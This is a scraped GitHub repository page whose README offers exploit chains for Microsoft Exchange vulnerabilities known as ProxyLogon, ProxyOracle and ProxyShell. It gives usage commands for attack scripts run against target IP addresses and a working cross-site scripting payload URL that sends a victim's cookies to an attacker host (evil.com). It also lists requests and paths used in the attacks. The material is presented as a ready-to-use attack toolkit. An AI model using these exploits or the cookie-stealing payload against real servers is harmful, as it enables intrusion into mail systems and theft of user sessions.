Skip to content

[ProxyLogon] CVE-2021-26855 & CVE-2021-27065 Fixed RawIdentity Bug Exploit. [ProxyOracle] CVE-2021-31195 & CVE-2021-31196 Exploit Chains. [ProxyShell] CVE-2021-34473 & CVE-2021-34523 & CVE-2021-31207 Exploit Chains.

Notifications You must be signed in to change notification settings

hosch3n/ProxyVulns

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

ProxyVulns

ProxyLogon

Usage: python3 26855.py 1.1.1.1

ProxyOracle

Once a victim clicks this link, evil.com will receive the cookies.

https://ews.lab/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.cookie=`X-AnonResource-Backend=@evil.com:443/path/any.php%23~1941962753`;document.cookie=`X-AnonResource=true`;fetch(`/owa/auth/any.skin`,{credentials:`include`});//
pip3 install pycryptodome

Usage: python3 31196.py 1.1.1.1 'cadata=xxx; cadataTTL=yyy; ...'

ProxyShell

pip3 install pypsrp

Usage: python3 34473.py 1.1.1.1

Usage: python3 31207.py 1.1.1.1 [Local File Path] [UNC Absolute Path]

Not working in some versions target(due to /@gmail.com path), maybe fix it later

Others

  • Cookie: securitytoken=foobar

  • /owa/calendar/foobar@exchange.local/foobar/owa14.aspx/.js

Reference

ProxyLogon Vulnerability Analysis(Chinese)

https://docs.microsoft.com/en-us/exchange/architecture/mailbox-servers/recreate-arbitration-mailboxes?view=exchserver-2019

ProxyOracle Vulnerability Analysis(Chinese)

https://github.com/mwielgoszewski/python-paddingoracle

ProxyShell Vulnerability Analysis(Chinese)

About

[ProxyLogon] CVE-2021-26855 & CVE-2021-27065 Fixed RawIdentity Bug Exploit. [ProxyOracle] CVE-2021-31195 & CVE-2021-31196 Exploit Chains. [ProxyShell] CVE-2021-34473 & CVE-2021-34523 & CVE-2021-31207 Exploit Chains.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages